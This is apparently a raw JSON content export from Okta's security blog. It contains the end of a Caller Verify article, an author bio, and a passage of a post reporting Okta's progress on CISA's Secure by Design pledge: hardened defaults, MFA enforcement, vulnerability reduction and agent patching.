Verify ensures that only authorized employees can ask IT support to perform sensitive operations that involve an Okta account.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"In line with Okta’s \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/fr-fr/newsroom/press-releases/introducing-the-okta-secure-identity-commitment/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"ongoing commitment \",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\"to hardening our corporate infrastructure, Okta requires that users satisfy all authentication challenges using phishing-resistant authentication methods (such as FastPass with an Okta Verify-enrolled device, or a registered Yubikey), including the challenges required to open a support request.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Stay secure\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Caller Verify plays an important role in Okta’s end-to-end ability to protect all enrollment, authentication and recovery flows with phishing-resistant authentication. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"To learn about Okta’s use of ID Verification to secure enrollment and recovery, read on for \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://sec.okta.com/articles/2025/02/how-okta-embraces-identity-verification-using-persona/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"how we leverage Okta’s integration with Persona\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\". \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"document\"}"},"summary":{"summary":"The days when the name of your childhood best friend or your first car model provided enough assurance to validate your identity are long gone. That’s where Caller Verify can help."},"updatedAt":"2025-06-18T17:25:51.381Z","secAuthor":[{"id":"2f88c41e-3abf-5fcc-9a06-9ed78081f8e2","bio":{"bio":"Carmen Girardin is a Manager, Security Communications at Okta. Backed by over a decade of experience in the fintech sector, Carmen is a proficient technical writer with domain expertise in Identity and Access Management (IAM). She is passionate about delivering engaging, timely customer communications on the cybersecurity ecosystem and the evolving threat landscape, to help our customers gain the most value from Okta. Carmen spends her downtime traveling, thrifting for treasures and reading.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/gBvc42utKRh6jJpgLjxrt/fb5e38cd4c6043a5e888850b4b2c2df4/IMG_8061.jpg"},"name":"Carmen Girardin","jobTitle":"Manager, Security Communications","slug":"/hackers/carmen-girardin","node_locale":"en"}]},{"slug":"/articles/2025/05/oktas-secure-by-design-pledge-one-year-on","id":"dbeedf3c-399d-530e-b334-01b80ddd7871","title":"Okta’s Secure by Design Pledge - One Year On","date":"2025-05-22T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Foreword \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\\nA year ago, Okta was among the first technology providers to pledge our commitment to the US Cybersecurity and Infrastructure Security Agency (CISA)'s seven Secure by Design principles.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To CISA’s great credit, the Secure by Design voluntary pledge program has created strong momentum across the cybersecurity industry. Nearly 300 technology companies have since signed the pledge, with most having made significant strides in documenting their progress toward these goals.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One year on, we’re taking a moment to reflect and share an update on Okta’s progress.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As part of Okta’s commitment to Secure by Design, the default configuration for all new Okta tenants has been hardened as follows:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"New Default\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Details\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Context\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Date of change\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Secure Creation of API Tokens\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrators are prompted for step-up authentication and prompted to assign an IP allowlist for all new SSWS API tokens.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All Administrative Users, Okta Identity Engine and Okta Classic Engine\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"May 2025\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Phishing Resistance\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All new authentication and account management policies in Okta Workforce Identity will enforce phishing resistance by default if users are enrolled in phishing-resistant authenticators.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All Users, Okta Identity Engine\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"April 2025\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Step-Up Authentication\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Protected Actions are enabled by default, ensuring step-up authentication is applied for policy modifications.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All Administrative Users, Okta Identity Engine and Okta Classic Engine\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"April 2025\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Maximum Global Session Lifetime\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The default maximum Okta global session lifetime is now set to 24 hours.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All Users, Okta Identity Engine\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"March 2025\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Reauthentication Frequency\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The default reauthentication frequency in authentication policies was changed to one hour. \\n\\nThe option to force re-authentication “every time a user signs in to resource” is also labelled as the most secure option available in Okta Identity Engine.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All Users, Okta Identity Engine and Okta Classic Engine\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"March 2025 in Okta Identity Engine\\n\\nMay 2025 in Okta Classic Engine\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"MFA Requirement\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The default selection presented to administrators creating a new authentication policy in Okta Identity Engine is now “Any 2 factor types”.\\n\\nIn the Okta Classic Engine, MFA is now enabled by default in new app sign-on rules when MFA factors are available to users.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All Users, Okta Identity Engine\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"March 2025\\n\\nMay 2025 in Okta Classic Engine\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Session risk Evaluation\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"User and entity session risk evaluations are now available in System Log for all accounts directly assigned with Super Administrator permissions.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrative Users, Okta Identity Engine\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"March 2025\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Directory Agent Hardening\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta directory agents now support end to end encryption and sender-constrained tokens using DPoP by default.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All Users, Okta Identity Engine and Okta Classic Engine\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"July-\\nNovember 2024 in Okta Identity Engine\\n\\nJanuary 2025 in Okta Classic Engine\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"MFA Enforcement\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All new authentication policies for the Okta Admin Console require multi-factor authentication.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All Administrative Users, Okta Identity Engine, Okta Classic Engine and Auth0 Management Console\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"August 2024\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"IP Session Binding\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"By default, all API and web requests made to the Okta service by users with administrative permissions are bound to the device IP address recorded at the time of sign-in.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All Administrative Users, Okta Identity Engine and Okta Classic Engine\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"August 2024\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Under the Secure by Design pledge, Okta committed to measurable improvements in seven key areas identified by CISA. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s full-year update for each of those initiatives is provided below.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1. Driving Adoption of Multi-Factor Authentication\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within one year of signing the pledge, demonstrate actions taken to measurably increase the use of multi-factor authentication across the manufacturer’s products.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has built on its best-in-class record for customer adoption of multi-factor authentication (MFA) among both users and administrators of Okta Workforce Identity.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"During the course of the one-year pledge, Okta had three primary goals:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"ordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enforce MFA for all administrative access to management consoles,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Drive rapid adoption of high assurance, phishing-resistant authenticators such as Okta FastPass and FIDO2 passkeys,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Reduce customer exposure to weaker authentication methods.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Access to the Okta Admin Console or the Auth0 Management console now requires multi-factor authentication (MFA). \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Reaching this milestone required an exhaustive program that restricted the ability for administrators to create a single factor authentication policy for the Okta Admin console, and worked closely with a large number of customers to ensure that their existing policies could meet this requirement prior to enforcement.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We identified early in the process that some customers needed more time to meet this requirement - especially customers that allowed inline MFA enrolment, used inbound federation or relied on certain configurations of third-party Privileged Access Management solutions to access the Okta Admin Console. Okta released several innovations, such as \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/guides/configure-claims-sharing/oktaoidc/main/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"authenticator claims sharing\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", to ensure MFA would always be applied, while maintaining a great experience for administrators. We thank these customers for taking this journey with us for the sake of our mutual security!\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We’re also very pleased to see rapid growth in high assurance, phishing-resistant authentication factors during the course of the pledge. According to Okta’s \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/au/blog/2025/03/businesses-at-work-2025/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Businesses at Work 2025\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" report, the volume of Okta FastPass authentications increased by 377% over 12 months. The total number of FastPass authentications backed by biometrics such as fingerprints or facial recognition increased by 288%. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"By contrast, the use of lower assurance authentication methods has reduced: security questions by 12% and SMS/Voice Call by 14%.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"2. Reducing the use of default passwords\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within one year of signing the pledge, demonstrate measurable progress towards reducing default passwords across the manufacturers’ products.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As noted at the halfway point of the pledge term, Okta did not feel it necessary to pursue any further changes regarding default passwords. Where on-premise appliances, clients or agents require default credentials at installation, Okta enforces the required rotation of these credentials at first sign-in.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"3. Reduce common classes of vulnerabilities\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within one year of signing the pledge, demonstrate actions taken towards enabling a significant measurable reduction in the prevalence of one or more vulnerability classes across the manufacturer’s products.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"At the start of the pledge term, Okta committed to initiating a company-wide campaign to drive down exposure to a particular class of vulnerability.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Our first task was to classify vulnerabilities using a consistent methodology across the multiple products and services developed by Okta. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Product Security aggregated vulnerability data from all Auth0 and Okta products to create a single source of truth where vulnerability data could be normalized, analyzed, and classified.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This analysis painted a clear picture of what required more focus: a subset of vulnerabilities classed as \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Server Security Misconfigurations\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" in the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://bugcrowd.com/vulnerability-rating-taxonomy\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Bugcrowd VRT\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For each shortlisted vulnerability, Product Security conducted “deep reviews” - technical investigations focused on specific vulnerability types, scoped for the entire codebase of Okta products, per their robust \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/resources/whitepaper-secure-development-lifecycle/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"secure development practices\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". The reviews identified several issues that have since been remediated.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As part of this work, we developed and shared our methodology for reducing vulnerability classes. The methodology consists of distinct phases:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Data Analysis - the aggregation, classification and trend analysis of vulnerability information.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Scope Definition and Plan Execution - prioritizing results from data analysis based on frequency and risk, creating action plans, and executing and tracking remediation.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Program improvements - creating standard trending metrics, vulnerability classification standardization, and shorter feedback loops.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This methodology was shared with the CISA Secure by Design working group. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"4. Drive improved customer patching hygiene\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within one year of signing the pledge, demonstrate actions taken to measurably increase the installation of security patches by customers.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Under the shared responsibility model for security, customers are accountable for maintaining up-to-date versions of client software. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The CISA Secure by Design pledge promotes adoption of a “shared fate” approach to customer patching, where service providers play a more active role in steering customers toward better security outcomes. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has made measurable progress in our commitment to making it easy for customers to maintain up-to-date versions of client software.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"During the course of the pledge, we embarked on a campaign to convince customers to upgrade their AD (Active Directory) or LDAP agents to versions that include additional security controls.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As background; some Okta Workforce Identity customers choose to delegate primary authentication to on-premise directories such as Active Directory (AD) or LDAP. In these hybrid identity flows, users signing in to access cloud resources provide credentials that are forwarded to an agent running on a host on the customer’s network to check their validity. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In these configurations, the integrity of the customer’s Okta implementation relies, to some degree, on the customer’s Active Directory hygiene. A disproportionate share of incidents reported by customers to Okta Identity Defence arise from an existing compromise of the customer’s Active Directory network.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In July 2024, Okta released a redesigned AD agent that adopted the “Demonstrating Proof of Possession” (DPoP) extension to OIDC, and added the same protection to the Okta LDAP agent from November 2024. While DPoP does not directly prevent a compromise of a Windows host, it can significantly reduce the blast radius for any compromise of the on-prem server(s) a customer uses to host these agents. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within 90 days of the release of the AD Agent, 44% of customers updated their agents to a version that included DPoP. A follow-up communications campaign, in which Okta mooted the possibility of removing support for versions that did not include these protections, drove adoption to 83%. The following version introduced support for end-to-end encryption.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We also observed that one of the primary instruments to achieving stronger customer patching hygiene is the availability and uptake of “automatic update” features in any given product. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We have observed that while customers are very comfortable with automatic update mechanisms in software deployed to end-user clients, we face more resistance when customers are asked to enable automatic updates in client-side software deployed to servers. There is legitimate concern among CISOs - largely based on adverse events at other vendors - as to whether suppliers adequately test updates for every possible customer configuration prior to their release. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"During the term of the pledge, Okta ran direct-to-customer communications campaigns to assure customers of Okta’s strong record for stable updates. This drove a 6% increase in adoption. We continue to assess new ways of driving confidence in these controls. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"5. Publish a Vulnerability Disclosure Policy\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within one year of signing the pledge, publish a vulnerability disclosure policy (VDP) that authorizes testing by members of the public on products offered by the manufacturer, commits to not recommending or pursuing legal action against anyone engaging in good faith efforts to follow the VDP, provides a clear channel to report vulnerabilities, and allows for public disclosure of vulnerabilities in line with coordinated vulnerability disclosure best practices and international standards. \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has, as pledged, maintained 100% coverage of all Okta GA products in Bug Bounty programs and continues to publish a 